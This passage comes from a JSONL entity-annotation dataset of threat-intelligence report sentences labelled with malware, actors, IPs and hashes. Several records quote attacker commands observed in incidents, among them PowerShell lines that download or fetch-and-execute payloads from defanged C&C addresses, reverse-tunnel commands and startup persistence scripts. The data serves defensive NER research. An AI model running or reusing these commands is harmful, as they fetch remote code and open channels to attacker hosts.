March.","entities":[{"id":45935,"label":"TIME","start_offset":73,"end_offset":81},{"id":45936,"label":"TIME","start_offset":86,"end_offset":91}],"relations":[],"Comments":[]} +{"id":12910,"text":"Technique: A detection on technique means the detection can be attributed to a specific adversarial action (e.g. credential dumping).","entities":[{"id":40191,"label":"location","start_offset":36,"end_offset":41},{"id":40192,"label":"location","start_offset":56,"end_offset":59},{"id":40193,"label":"location","start_offset":100,"end_offset":106},{"id":40194,"label":"attack-pattern","start_offset":113,"end_offset":131}],"relations":[],"Comments":[]} +{"id":3786,"text":" Latest News | Exploits & Vulnerabilities | Cyber Threats | Connected Car | APT & Targeted Attacks | Endpoints | IoT | Video","entities":[],"relations":[],"Comments":[]} +{"id":834,"text":" One key thing that research into these security incidents shows is that these attacks used a relatively new and unknown technique called kernel APC attacks as part of their toolkit.","entities":[{"id":44878,"label":"attack-pattern","start_offset":138,"end_offset":156}],"relations":[],"Comments":[]} +{"id":6794,"text":"Connect with \u201chxxp:\/\/ kristom[.]hopto[.]org \/{computer name}_{hexadecimal volume serious number}\/help_05_03[.]php\u201d (MITRE ATT&CK framework IDs T1043, T1071, T1082)","entities":[],"relations":[],"Comments":[]} +{"id":3732,"text":" Multiple writeups detailing exploitation scenarios for the aforementioned two vulnerabilities were published in the last week of April, finally followed by a CISA Alert on May 18.","entities":[{"id":49537,"label":"TIME","start_offset":117,"end_offset":135},{"id":49538,"label":"identity","start_offset":159,"end_offset":163},{"id":49539,"label":"TIME","start_offset":173,"end_offset":179}],"relations":[],"Comments":[]} +{"id":400,"text":" Existing Xpanse customers can log into Expander and identify their enumerated Atlassian Confluence devices by filtering by \u201cAtlassian Confluence Server\u201d in the Services tab.","entities":[{"id":46099,"label":"SOFTWARE","start_offset":10,"end_offset":16},{"id":46101,"label":"SOFTWARE","start_offset":125,"end_offset":152},{"id":46100,"label":"SOFTWARE","start_offset":79,"end_offset":99}],"relations":[],"Comments":[]} +{"id":13145,"text":"Articles, News, Reports","entities":[],"relations":[],"Comments":[]} +{"id":4685,"text":"PipeCommunication pipeCommunication = new PipeCommunication(true, text); bool flag = false; while (!flag)","entities":[],"relations":[],"Comments":[]} +{"id":3064,"text":" Figure 4 Hard-coded fake threat detection results ","entities":[],"relations":[],"Comments":[]} +{"id":6388,"text":" After validating that badger_x64.exe and OneDrive.Update were both BRc4 payloads, we set to work analyzing the employment of this second sample.","entities":[{"id":19807,"label":"location","start_offset":38,"end_offset":41},{"id":19808,"label":"tools","start_offset":68,"end_offset":72},{"id":19810,"label":"location","start_offset":138,"end_offset":144}],"relations":[],"Comments":[]} +{"id":13360,"text":"The C&C server 104[.]233[.]224[.]227 was hosted under a small hosting service with only 64 IPs under it.","entities":[{"id":41555,"label":"IPV4","start_offset":15,"end_offset":36},{"id":41556,"label":"location","start_offset":56,"end_offset":61}],"relations":[],"Comments":[]} +{"id":7041,"text":"Windows Management Instrumentation (WMI) will be used to run dlpumgr32.exe with arguments \u201c-up -run -x\u201d and it will exit the current process.","entities":[{"id":22079,"label":"attack-pattern","start_offset":0,"end_offset":34},{"id":22080,"label":"location","start_offset":41,"end_offset":45},{"id":22081,"label":"location","start_offset":104,"end_offset":107},{"id":22082,"label":"location","start_offset":111,"end_offset":115}],"relations":[],"Comments":[]} +{"id":12994,"text":"Recently observed Turla domains: COLDRIVER, a Russian-based threat actor sometimes referred to as Callisto, continues to use Gmail accounts to send credential phishing emails to a variety of Google and non-Google accounts.","entities":[{"id":40471,"label":"attack-pattern","start_offset":159,"end_offset":167},{"id":40473,"label":"location","start_offset":198,"end_offset":201}],"relations":[],"Comments":[]} +{"id":7689,"text":"Figure 3.","entities":[],"relations":[],"Comments":[]} +{"id":198,"text":"On Feb. 15, the Cyberpolice of Ukraine reported that residents were actively receiving fake SMS text messages.","entities":[{"id":45894,"label":"TIME","start_offset":3,"end_offset":10},{"id":44614,"label":"identity","start_offset":16,"end_offset":38},{"id":44615,"label":"attack-pattern","start_offset":77,"end_offset":109}],"relations":[],"Comments":[]} +{"id":1406,"text":"In this case the e-mails claim to contain a document about a court case.","entities":[],"relations":[],"Comments":[]} +{"id":2644,"text":" In some cases, LockBit 2.0 operators have performed DDoS attacks on the victims' infrastructure as well as using a leak site.","entities":[{"id":47831,"label":"malware","start_offset":16,"end_offset":27},{"id":47832,"label":"attack-pattern","start_offset":53,"end_offset":65}],"relations":[],"Comments":[]} +{"id":4163,"text":"We found some special mutexes that are encoded by the layout of the Chinese Zhuyin keyboard in ChiserClient.","entities":[{"id":49969,"label":"malware","start_offset":95,"end_offset":107}],"relations":[],"Comments":[]} +{"id":4272,"text":"Some of these samples were several years old and had left the original name of the bit-flip decryption algorithm, which was \u201cEnDecrypt\u201d.","entities":[],"relations":[],"Comments":[]} +{"id":1567,"text":"This Unit 42 blog post provides an update on the threat situation surrounding the Bad Rabbit ransomware attacks.","entities":[{"id":4684,"label":"identity","start_offset":5,"end_offset":12},{"id":4686,"label":"malware","start_offset":82,"end_offset":92}],"relations":[],"Comments":[]} +{"id":2004,"text":" cmd.exe \/C ping 1.1.1[.]1 -n 1 -w 3000 > Nul & Del \/f \/q \"C:\\Users\\admin\\Desktop\\xd.exe\"","entities":[{"id":45219,"label":"FILEPATH","start_offset":59,"end_offset":88},{"id":45220,"label":"FILEPATH","start_offset":1,"end_offset":8},{"id":5931,"label":"tools","start_offset":12,"end_offset":16},{"id":5932,"label":"IPV4","start_offset":17,"end_offset":26}],"relations":[],"Comments":[]} +{"id":5226,"text":"Android malware like ransomware exemplify how the platform can be lucrative for cybercriminals.","entities":[{"id":51259,"label":"SOFTWARE","start_offset":0,"end_offset":7}],"relations":[],"Comments":[]} +{"id":3436,"text":"This post is also available in: \u65e5\u672c\u8a9e (Japanese) On May 4, 2022, F5 released a security advisory for a remote code execution vulnerability in the iControlREST component of its BIG-IP product tracked in CVE-2022-1388.","entities":[{"id":49195,"label":"vulnerability","start_offset":206,"end_offset":219},{"id":49196,"label":"vulnerability","start_offset":107,"end_offset":142},{"id":49193,"label":"TIME","start_offset":53,"end_offset":67},{"id":49194,"label":"identity","start_offset":69,"end_offset":71},{"id":49197,"label":"tools","start_offset":150,"end_offset":162}],"relations":[{"id":750,"from_id":49196,"to_id":49195,"type":"duplicate-of"},{"id":751,"from_id":49197,"to_id":49195,"type":"has"}],"Comments":[]} +{"id":3931,"text":"expand {filename}.ex_ {filename}.dat expand {filename}.ex_ {filename}.exe","entities":[],"relations":[],"Comments":[]} +{"id":567,"text":"Figure 6 is a screenshot of a recently captured Virlock ransom note.","entities":[{"id":44781,"label":"malware","start_offset":48,"end_offset":55}],"relations":[],"Comments":[]} +{"id":10514,"text":"To help protect users against these kinds of tracks, our Advanced Protection Program (APP) utilizes hardware security keys and provides the strongest protections available against phishing and account hijackings.","entities":[{"id":31984,"label":"location","start_offset":66,"end_offset":76},{"id":31985,"label":"location","start_offset":109,"end_offset":117},{"id":31986,"label":"location","start_offset":123,"end_offset":126},{"id":31987,"label":"attack-pattern","start_offset":180,"end_offset":188},{"id":31988,"label":"location","start_offset":189,"end_offset":192}],"relations":[],"Comments":[]} +{"id":13761,"text":"Offset 0xAC, Size 0x02: Port Offset 0xAE, Size 0x5A: Reserved bytes Table:","entities":[],"relations":[],"Comments":[]} +{"id":11693,"text":"af[.]org","entities":[],"relations":[],"Comments":[]} +{"id":10401,"text":"Connect to the C&C server every 10 seconds to download, save, and execute script files containing the commands.","entities":[{"id":31646,"label":"TIME","start_offset":26,"end_offset":42},{"id":31647,"label":"location","start_offset":56,"end_offset":60},{"id":31648,"label":"location","start_offset":62,"end_offset":65}],"relations":[],"Comments":[]} +{"id":3772,"text":"Presently, customers may leverage the following to block or detect the threats communicated throughout this publication:","entities":[],"relations":[],"Comments":[]} +{"id":11530,"text":"Russia","entities":[],"relations":[],"Comments":[]} +{"id":2595,"text":"This included the soon-to-be de rigueur data exfiltration and deletion technique, and also redirection of some DNS records.","entities":[],"relations":[],"Comments":[]} +{"id":7653,"text":"Using Kronos and SmokeLoader (v2019) TA505 previously used Amadey to distribute the FlawedAmmyy downloader before, so the use of Kronos and SmokeLoader can\u2019t be considered strong evidence of false attribution.","entities":[{"id":23802,"label":"location","start_offset":13,"end_offset":16},{"id":23803,"label":"malware","start_offset":17,"end_offset":28},{"id":23808,"label":"location","start_offset":136,"end_offset":139},{"id":23810,"label":"location","start_offset":172,"end_offset":178}],"relations":[],"Comments":[]} +{"id":4842,"text":"Some hack-for-hire attackers openly advertise their products and services to anyone willing to pay, while others operate more discreetly selling to a limited audience.","entities":[{"id":50798,"label":"attack-pattern","start_offset":5,"end_offset":18}],"relations":[],"Comments":[]} +{"id":3827,"text":"Set QWORD Value {Variable}.registry.write Write\/Add Registry {Variable}.registry.provider Create Registry Handle {Variable}.registry.destroy Deletes Registry Key {Variable}.registry.read Get\/Read Registry Entries {Variable}.WMI WMI-related functions {","entities":[],"relations":[],"Comments":[]} +{"id":224,"text":"Figure 8 shows that the number of Ukraine-related phishing\/scam sites is currently continuing to rise about a month after the \u201cUkraine aid\u201d search term started trending in Google search.","entities":[{"id":747,"label":"attack-pattern","start_offset":50,"end_offset":58},{"id":45924,"label":"attack-pattern","start_offset":59,"end_offset":69},{"id":45926,"label":"location","start_offset":34,"end_offset":41},{"id":45927,"label":"SOFTWARE","start_offset":172,"end_offset":178}],"relations":[],"Comments":[]} +{"id":5032,"text":"If the user clicked continue, they would be redirected to an attacker controlled site that collected the users credentials.","entities":[],"relations":[],"Comments":[]} +{"id":322,"text":" Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} +{"id":5546,"text":"Unfortunately, there\u2019s nothing obvious that differentiates a website infected with Magecart from any other site.","entities":[{"id":51539,"label":"malware","start_offset":83,"end_offset":91}],"relations":[],"Comments":[]} +{"id":743,"text":"This year Microsoft has already patched 126 IE vulnerabilities to date.","entities":[{"id":46335,"label":"identity","start_offset":10,"end_offset":19}],"relations":[],"Comments":[]} +{"id":201,"text":"These attacks impacted Ukrainian government organizations including the Ministry of Defense, Ministry of Foreign Affairs, Armed Forces of Ukraine and the publicly funded broadcaster Ukrainian Radio.","entities":[{"id":44616,"label":"identity","start_offset":23,"end_offset":43},{"id":44617,"label":"identity","start_offset":72,"end_offset":91},{"id":44618,"label":"identity","start_offset":93,"end_offset":120},{"id":44619,"label":"identity","start_offset":122,"end_offset":145},{"id":44620,"label":"identity","start_offset":182,"end_offset":197}],"relations":[],"Comments":[]} +{"id":2597,"text":"This initial focus has led to speculation that Lapsus$ Group may be Brazilian, although we understand the choice of targets to have been influenced by extended team members rather than the team leadership.","entities":[{"id":47788,"label":"threat-actor","start_offset":47,"end_offset":54},{"id":47789,"label":"location","start_offset":68,"end_offset":77}],"relations":[{"id":356,"from_id":47788,"to_id":47789,"type":"located-at"}],"Comments":[]} +{"id":14226,"text":"How is GitHub abused?","entities":[{"id":48412,"label":"SOFTWARE","start_offset":7,"end_offset":14}],"relations":[],"Comments":[]} +{"id":813,"text":" Ignite '17 Security Conference: Vancouver, BC June 12\u201315, 2017 Ignite '17 Security Conference is a live, four-day conference designed for today\u2019s security professionals.","entities":[{"id":46365,"label":"TIME","start_offset":47,"end_offset":63},{"id":46366,"label":"location","start_offset":33,"end_offset":46}],"relations":[],"Comments":[]} +{"id":13995,"text":"Recently, we uncovered the Operation Earth Kitsune campaign and published a detailed analysis of its tactics, techniques, and procedures (TTPs).","entities":[{"id":48780,"label":"campaign","start_offset":27,"end_offset":50}],"relations":[],"Comments":[]} +{"id":13852,"text":"Updated May 17, 2021, 3:25 a.m. Eastern Time:","entities":[{"id":42957,"label":"TIME","start_offset":22,"end_offset":44}],"relations":[],"Comments":[]} +{"id":7247,"text":"The DLL is custom malware that would immediately begin communicating with actor-controlled C2 domains.","entities":[],"relations":[],"Comments":[]} +{"id":6164,"text":"Appending their malicious script to the victim\u2019s email signature to propagate the infection to their contacts.","entities":[],"relations":[],"Comments":[]} +{"id":7375,"text":"head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","entities":[],"relations":[],"Comments":[]} +{"id":12637,"text":".pptx .pst .rar .sh .sql .txt .xls .xlsx .xml .zip","entities":[],"relations":[],"Comments":[]} +{"id":5587,"text":" Figure 5. Infected Linux device connected to a C&C server ","entities":[],"relations":[],"Comments":[]} +{"id":477,"text":"New anti-DGA technologies that leverage machine learning and big data are capable of countering DGA\u2019s automation with automated prediction of their own that can anticipate, block, assist with malicious site takedowns or even, in some cases, prevent those malicious sites from being used in the first place.","entities":[],"relations":[],"Comments":[]} +{"id":13267,"text":"TClient is injected into dllhost.exe Malware Analysis wab32res.dll (FakeRun loader) loads TClient.","entities":[{"id":41339,"label":"malware","start_offset":0,"end_offset":7},{"id":41340,"label":"malware","start_offset":91,"end_offset":98}],"relations":[],"Comments":[]} +{"id":149,"text":"The most common way ransomware operators levy attacks is through email or by web browsing to malicious or compromised sites.","entities":[{"id":45848,"label":"attack-pattern","start_offset":65,"end_offset":123}],"relations":[],"Comments":[]} +{"id":6807,"text":" Network destination for template injection: 176[.]119[.]147[.]225 Network destination for VBS: 176[.]57[.]215[.]115 These IP addresses are from Russian hosting companies.","entities":[{"id":21172,"label":"IPV4","start_offset":45,"end_offset":66},{"id":21173,"label":"IPV4","start_offset":96,"end_offset":116},{"id":21174,"label":"location","start_offset":137,"end_offset":140}],"relations":[],"Comments":[]} +{"id":11099,"text":"As part of our wider tracking of APT31 activity, we've also seen them deploy targeted malware campaigns.","entities":[{"id":33895,"label":"location","start_offset":65,"end_offset":69},{"id":33896,"label":"attack-pattern","start_offset":77,"end_offset":93}],"relations":[],"Comments":[]} +{"id":523,"text":"Web hosting ransomware can also be downloaded and successfully installed through a multi-layered infection chain among different file types.","entities":[{"id":46150,"label":"attack-pattern","start_offset":0,"end_offset":22}],"relations":[],"Comments":[]} +{"id":3658,"text":"Among these cybercriminals are financially motivated threat groups Carbanak and FIN7.","entities":[{"id":49428,"label":"threat-actor","start_offset":80,"end_offset":84},{"id":49427,"label":"threat-actor","start_offset":67,"end_offset":75}],"relations":[],"Comments":[]} +{"id":13292,"text":"Figure 13.","entities":[],"relations":[],"Comments":[]} +{"id":1119,"text":"This results in a few hundred thousand individual mutexes available for further analysis.","entities":[],"relations":[],"Comments":[]} +{"id":4756,"text":"Across all Google products, we incorporate industry-leading security features and protections to keep our users safe.","entities":[{"id":50661,"label":"identity","start_offset":11,"end_offset":17}],"relations":[],"Comments":[]} +{"id":8348,"text":"x.TextContent.StartsWith(\"Access for less secure apps has been turned on\") select x).ToList","entities":[],"relations":[],"Comments":[]} +{"id":3637,"text":"Once Charlie has access to Alice\u2019s email account, he then finds email conversations between Alice and Bob, his ultimate target.","entities":[],"relations":[],"Comments":[]} +{"id":4571,"text":"They continue to use the 'Browser in the Browser' phishing technique that TAG first observed and described in March.","entities":[{"id":50413,"label":"TIME","start_offset":110,"end_offset":115},{"id":50411,"label":"attack-pattern","start_offset":26,"end_offset":68},{"id":50412,"label":"identity","start_offset":74,"end_offset":77}],"relations":[],"Comments":[]} +{"id":1967,"text":"Before starting analysis, we needed to set up a test environment.","entities":[],"relations":[],"Comments":[]} +{"id":5342,"text":"Core component code that receives and decrypts data from the C&C server If something is received, it is decrypted and written to the main pipe.","entities":[],"relations":[],"Comments":[]} +{"id":3262,"text":"1. The \u201cnotice\u201d handler is used for checking the connection with the C&C server.","entities":[],"relations":[],"Comments":[]} +{"id":8691,"text":"No longer do groups need to have the technical expertise, now they just need resources.","entities":[{"id":26836,"label":"identity","start_offset":67,"end_offset":71}],"relations":[],"Comments":[]} +{"id":9674,"text":"For the initial information packet, the backdoor also collects the following: Figure 15.","entities":[],"relations":[],"Comments":[]} +{"id":5109,"text":"And the reason why I want to tackle this today is because I've had some conversations in the last few days that have really kind of hit that idea bulb that people don't truly understand how cybercriminals get away with their crimes in the organization.","entities":[],"relations":[],"Comments":[]} +{"id":10404,"text":"A partial code snippet of AutoHotkeyu32.ahk Figure 5.","entities":[],"relations":[],"Comments":[]} +{"id":2282,"text":"Furthermore, 3.5M users were warned before downloading a malicious file through Google Safe Browsing warnings.","entities":[{"id":47354,"label":"SOFTWARE","start_offset":80,"end_offset":100}],"relations":[],"Comments":[]} +{"id":985,"text":" Conclusion Even popular third party monetization platforms are not always trustworthy.","entities":[],"relations":[],"Comments":[]} +{"id":8193,"text":" Figure 5.","entities":[],"relations":[],"Comments":[]} +{"id":13959,"text":"A successful attack on a company providing critical services will have rippling effects that will harm multiple sectors of society, which is why protecting these services should be a top priority.","entities":[],"relations":[],"Comments":[]} +{"id":14257,"text":"Abusing popular platforms like GitHub enables threat actors like Winnti to maintain network persistence between compromised computers and their servers, while staying under the radar.","entities":[{"id":48451,"label":"threat-actor","start_offset":65,"end_offset":72}],"relations":[],"Comments":[]} +{"id":1943,"text":"The header for a sample document can be seen below.","entities":[],"relations":[],"Comments":[]} +{"id":4585,"text":"In March 2021, Microsoft kicked off the patch cycle early after releasing an advisory regarding the mass exploitation of four zero-days vulnerabilities by a Chinese Hacking group, HAFNIUM, on the on-premises versions of the Microsoft Exchange Server.","entities":[{"id":50436,"label":"TIME","start_offset":3,"end_offset":13},{"id":50437,"label":"identity","start_offset":15,"end_offset":24},{"id":50438,"label":"vulnerability","start_offset":126,"end_offset":151},{"id":50439,"label":"threat-actor","start_offset":180,"end_offset":187},{"id":50440,"label":"location","start_offset":157,"end_offset":164},{"id":50441,"label":"SOFTWARE","start_offset":196,"end_offset":249}],"relations":[{"id":971,"from_id":50439,"to_id":50440,"type":"located-at"},{"id":972,"from_id":50439,"to_id":50438,"type":"exploits"},{"id":973,"from_id":50441,"to_id":50438,"type":"has"}],"Comments":[]} +{"id":3425,"text":" fb770a3815c9ebcf1ba46b75b8f3686acc1af903de30c43bab8b86e5b46de851","entities":[{"id":10318,"label":"SHA2","start_offset":1,"end_offset":65}],"relations":[],"Comments":[]} +{"id":1712,"text":"In this case a legitimate service (Tor) was being abused by CryptoWall so it could avoid having its C2 servers shut down.","entities":[{"id":5086,"label":"malware","start_offset":60,"end_offset":70},{"id":5085,"label":"tools","start_offset":35,"end_offset":38}],"relations":[{"id":249,"from_id":5086,"to_id":5085,"type":"uses"}],"Comments":[]} +{"id":522,"text":"For example, the URL links can be posted on forums or chat group software, sent by IM applications, offered via fake freeware for download or attached in emails.","entities":[{"id":45793,"label":"attack-pattern","start_offset":112,"end_offset":125},{"id":46149,"label":"attack-pattern","start_offset":142,"end_offset":160}],"relations":[],"Comments":[]} +{"id":4799,"text":"Google\u2019s Threat Analysis Group (TAG) continues to closely monitor the cybersecurity environment in Eastern Europe with regard to the war in Ukraine.","entities":[{"id":50699,"label":"location","start_offset":140,"end_offset":147},{"id":50697,"label":"identity","start_offset":0,"end_offset":36},{"id":50698,"label":"identity","start_offset":99,"end_offset":113}],"relations":[],"Comments":[]} +{"id":11942,"text":"We terminated 9 YouTube channels as part of our investigation into coordinated influence operations linked to China.","entities":[],"relations":[],"Comments":[]} +{"id":4010,"text":"To mitigate such risk, organizations must think globally and exert efforts to follow codes of local culture.","entities":[],"relations":[],"Comments":[]} +{"id":9630,"text":"This is shown in the figure below.","entities":[],"relations":[],"Comments":[]} +{"id":5277,"text":"Mobile","entities":[],"relations":[],"Comments":[]} +{"id":3310,"text":"The command that we received showed that the targeted browsers include Google Chrome, Microsoft Edge Beta, 360 Chrome, QQ Browser, 2345 Explorer, Sogou Explorer, and 360 Safe Browser.","entities":[{"id":48390,"label":"SOFTWARE","start_offset":71,"end_offset":84},{"id":48394,"label":"SOFTWARE","start_offset":131,"end_offset":144},{"id":48395,"label":"SOFTWARE","start_offset":146,"end_offset":160},{"id":48396,"label":"SOFTWARE","start_offset":166,"end_offset":182},{"id":48391,"label":"SOFTWARE","start_offset":86,"end_offset":105},{"id":48392,"label":"SOFTWARE","start_offset":107,"end_offset":117},{"id":48393,"label":"SOFTWARE","start_offset":119,"end_offset":129}],"relations":[],"Comments":[]} +{"id":6099,"text":"Recently, FireEye published a blog titled \u201cOperation Poisoned Hurricane\u201d which detailed the use of PlugX malware variants signed with legitimate certificates that used Google Code project pages for command and control (C2).","entities":[{"id":18858,"label":"location","start_offset":62,"end_offset":71},{"id":18859,"label":"malware","start_offset":99,"end_offset":104},{"id":18860,"label":"location","start_offset":206,"end_offset":209}],"relations":[],"Comments":[]} +{"id":4331,"text":"Stage 4 is the final payload (analyzed in the next section).","entities":[],"relations":[],"Comments":[]} +{"id":12646,"text":"Secret key generation","entities":[],"relations":[],"Comments":[]} +{"id":411,"text":"As that trend shows no sign of slowing down anytime soon, we can expect this to remain a very lucrative avenue for attackers.","entities":[],"relations":[],"Comments":[]} +{"id":5474,"text":"Its latest version can mute the device (i.e., take out the ringtone and vibration features) and sync call logs and SMSs.","entities":[],"relations":[],"Comments":[]} +{"id":11187,"text":"We have seen it deployed against fewer than two dozen accounts located in Iran.","entities":[],"relations":[],"Comments":[]} +{"id":10118,"text":"Backdoor.","entities":[],"relations":[],"Comments":[]} +{"id":65,"text":"A normal PC used to mine Monero can earn around US$0.25 per day at the current prices.","entities":[{"id":45824,"label":"SOFTWARE","start_offset":25,"end_offset":31}],"relations":[],"Comments":[]} +{"id":10153,"text":"We were able to collect evidence that credential phishing emails were sent to chmail.ir users on May 18, 2017, just one day before the presidential elections in Iran.","entities":[{"id":30973,"label":"attack-pattern","start_offset":49,"end_offset":57}],"relations":[],"Comments":[]} +{"id":7724,"text":"The .NET downloads jm1 \u2014 an .MSI installer \u2014 that installs another NSIS installer, leading to a ServHelper infection in the system.","entities":[{"id":23993,"label":"malware","start_offset":67,"end_offset":71},{"id":23994,"label":"malware","start_offset":96,"end_offset":106}],"relations":[],"Comments":[]} +{"id":1128,"text":"With the appropriate tools it\u2019s possible to enable a single researcher to continually review and categorize new mutexes.","entities":[],"relations":[],"Comments":[]} +{"id":10235,"text":" Recap of recent Pawn Storm activities Compromising accounts of users from the Middle East Trend Micro has been closely and consistently monitoring the activities of Pawn Storm, and in March 2020, we released our latest research on the group.","entities":[{"id":31264,"label":"location","start_offset":120,"end_offset":123},{"id":31265,"label":"threat-actor","start_offset":166,"end_offset":176},{"id":31266,"label":"location","start_offset":178,"end_offset":181}],"relations":[],"Comments":[]} +{"id":7857,"text":"As of July 7, this includes 85.8% of active Android devices.","entities":[],"relations":[],"Comments":[]} +{"id":8199,"text":"Table 1. Domains registered using the email address ","entities":[],"relations":[],"Comments":[]} +{"id":913,"text":"By comparison, the latest version of the CryptoWall malware family takes roughly 1-3 minutes to complete its encryption routine.","entities":[{"id":2888,"label":"malware","start_offset":41,"end_offset":51},{"id":2889,"label":"TIME","start_offset":73,"end_offset":92}],"relations":[],"Comments":[]} +{"id":583,"text":"Cortex XDR endpoint protection stops malware, exploits and ransomware before they can compromise endpoints.","entities":[{"id":46179,"label":"SOFTWARE","start_offset":0,"end_offset":10}],"relations":[],"Comments":[]} +{"id":2972,"text":"Preferably, find a password manager that requires two-factor authentication. 2. Protect Your Home Routers and Wi-Fi:","entities":[],"relations":[],"Comments":[]} +{"id":1161,"text":"If this functionality were available in some more open source setting, and was of even moderate quality, we would expect to see it used in other malware families as well.","entities":[],"relations":[],"Comments":[]} +{"id":6008,"text":"Recently observed IPs used in Curious Gorge campaigns: COLDRIVER, a Russian-based threat actor sometimes referred to as Calisto, has launched credential phishing campaigns, targeting several US based NGOs and think tanks, the military of a Balkans country, and a Ukraine based defense contractor.","entities":[{"id":18535,"label":"attack-pattern","start_offset":153,"end_offset":161},{"id":18537,"label":"location","start_offset":205,"end_offset":208},{"id":18539,"label":"location","start_offset":257,"end_offset":260}],"relations":[],"Comments":[]} +{"id":230,"text":" Figure 9. hxxps:\/\/startrackzm[.]com\/wap-admin\/ONE-DRIVE\/one%20d%20%20no%20auto.php?Email=REDACTED@REDACTED.gov.ua.","entities":[{"id":45930,"label":"URL","start_offset":11,"end_offset":114}],"relations":[],"Comments":[]} +{"id":4462,"text":"We remediated the compromises for these users and implemented controls to protect all Android users.","entities":[{"id":50246,"label":"SOFTWARE","start_offset":86,"end_offset":93}],"relations":[],"Comments":[]} +{"id":9650,"text":" Figure 6.","entities":[],"relations":[],"Comments":[]} +{"id":1874,"text":"The below example shows that the blocking works (output from the \"sc start\" command):","entities":[],"relations":[],"Comments":[]} +{"id":2140,"text":"With this addition protection available, our customers can and should include that as part of their decisions around security and deployment of the security updates and their risk assessment of the vulnerability and threat environment.","entities":[],"relations":[],"Comments":[]} +{"id":12680,"text":"As announced today, Google has taken action to disrupt the operations of Glupteba, a multi-component botnet targeting Windows computers.","entities":[{"id":39345,"label":"location","start_offset":37,"end_offset":43},{"id":39346,"label":"malware","start_offset":73,"end_offset":81}],"relations":[],"Comments":[]} +{"id":1899,"text":"Upon writing this entry, we\u2019ve coordinated with Google to ensure that the malicious applications these C&C sites advertise are no longer available for download on the Google Play Store.","entities":[{"id":45172,"label":"identity","start_offset":48,"end_offset":54},{"id":45173,"label":"SOFTWARE","start_offset":167,"end_offset":184}],"relations":[],"Comments":[]} +{"id":2347,"text":"We updated our operating system with the latest patch at the time (2021-004) and tried the exploit again.","entities":[{"id":47401,"label":"TIME","start_offset":67,"end_offset":75}],"relations":[],"Comments":[]} +{"id":13080,"text":"What are your thoughts on the ransomware attacks on retailers as we approach the busiest times of the year for retailers, including Black Friday, Cyber Monday and the holiday season?","entities":[],"relations":[],"Comments":[]} {"id":6483,"text":"LIGOLO execution example","entities":[],"relations":[],"Comments":[]} -{"id":6484,"text":" This was done using two separate commands: C:\\programdate\\1.exe -relayserver 87.236.212[.]184:5555 C:\\users\\public\\new.exe -relayserver 87.236.212[.]184:5555","entities":[],"relations":[],"Comments":[]} -{"id":6485,"text":"We then see the threat actor again attempting to use SharpChisel several times using the following command: C:\\programdata\\SharpChisel.exe client 87.236.212[.]184:8080 r:8888:127.0.0.1:9999 powershell.exe C:\\programdata\\SharpChisel.exe client 87.236.212[.]184:8080 R:8888:127.0.0.1:9999","entities":[],"relations":[],"Comments":[]} -{"id":6486,"text":"We conclude that a tunneling connection to the C&C server could not be established, even after attempts to do so with two different tools.","entities":[],"relations":[],"Comments":[]} -{"id":6488,"text":"The following PowerShell command was used for this: powershell.exe iwr -uri hxxp:\/\/87.236.212[.]184\/out1 -outfile c:\\users\\public\\out1.exe -usebasicparsing","entities":[{"id":20137,"label":"attack-pattern","start_offset":14,"end_offset":24},{"id":20138,"label":"tools","start_offset":100,"end_offset":104}],"relations":[],"Comments":[]} -{"id":6490,"text":"Using a UPX unpacker, we were able to extract the contents, which consists of a Python executable.","entities":[],"relations":[],"Comments":[]} -{"id":6491,"text":"We then decompiled the python executable using pyinstxtractor.py to get all of the Python bytecode files.","entities":[],"relations":[],"Comments":[]} -{"id":6493,"text":"The out1.exe RAT has the following capabilities: Data encoding Email parsing File and registry copy HTTP\/S connection support Native command line Process and file execution ","entities":[{"id":20142,"label":"attack-pattern","start_offset":50,"end_offset":63},{"id":20143,"label":"location","start_offset":83,"end_offset":86},{"id":20144,"label":"location","start_offset":155,"end_offset":158}],"relations":[],"Comments":[]} -{"id":6494,"text":"After this, the file C:\\users\\public\\Browser64.exe is run.","entities":[],"relations":[],"Comments":[]} -{"id":6495,"text":"Browser64 is a tool that extracts credentials from the following applications: Chrome Chromium Firefox Opera Internet Explorer Outlook Figure 8.","entities":[{"id":20146,"label":"location","start_offset":15,"end_offset":19},{"id":20147,"label":"threat-actor","start_offset":87,"end_offset":95},{"id":20148,"label":"location","start_offset":104,"end_offset":109},{"id":20149,"label":"location","start_offset":128,"end_offset":135}],"relations":[],"Comments":[]} -{"id":6496,"text":"Usage Example of Browser64.exe Following the use of browser64.exe, we observed the following command being executed: powershell.exe","entities":[],"relations":[],"Comments":[]} -{"id":6497,"text":"iex(new","entities":[],"relations":[],"Comments":[]} -{"id":6498,"text":"object","entities":[],"relations":[],"Comments":[]} -{"id":6499,"text":"System.Net.WebClient).DownloadString('hxxp:\/\/23.94.50[.]197:444\/index.jsp\/deb2b1a127c472229babbb8dc2dca1c2\/QPKb49mivezAdai1","entities":[{"id":20151,"label":"malware","start_offset":7,"end_offset":10},{"id":20152,"label":"MD5","start_offset":74,"end_offset":106}],"relations":[],"Comments":[]} -{"id":6501,"text":"Finally, we observed a persistence mechanism being set using the following commands: cmd.exe \/c Wscript.exe \"C:\\Users\\[REDACTED]\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\news.js\" cmd.exe \/c \"C:\\Users\\[REDACTED]\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\newsblog.js\"","entities":[{"id":20154,"label":"tools","start_offset":85,"end_offset":92},{"id":20155,"label":"malware","start_offset":201,"end_offset":208}],"relations":[],"Comments":[]} -{"id":6502,"text":" We were able to get a copy of newsblog.js, which is a simple VBS downloader that communicates with the following URL: hxxp:\/\/23[.]95[.]215[.]100:8008\/index.jsp\/7e95a3d753cc4a17793ef9513e030b49\/4t2Fg7k6wWRnKgd9 Figure 9.","entities":[{"id":20156,"label":"MD5","start_offset":151,"end_offset":210}],"relations":[],"Comments":[]} -{"id":6503,"text":"newsblog.js","entities":[],"relations":[],"Comments":[]} -{"id":6505,"text":"The script then executes an HTTP GET request to the C&C URL, grabs the server's response, and sleeps for 10 seconds.","entities":[{"id":20158,"label":"location","start_offset":61,"end_offset":66},{"id":20159,"label":"location","start_offset":90,"end_offset":93},{"id":20160,"label":"TIME","start_offset":105,"end_offset":115}],"relations":[],"Comments":[]} -{"id":6507,"text":"The response from the server contains an encoded PowerShell script, which is executed in memory.","entities":[{"id":20162,"label":"attack-pattern","start_offset":49,"end_offset":59}],"relations":[],"Comments":[]} -{"id":6508,"text":"Decoding this script reveals that it contains a 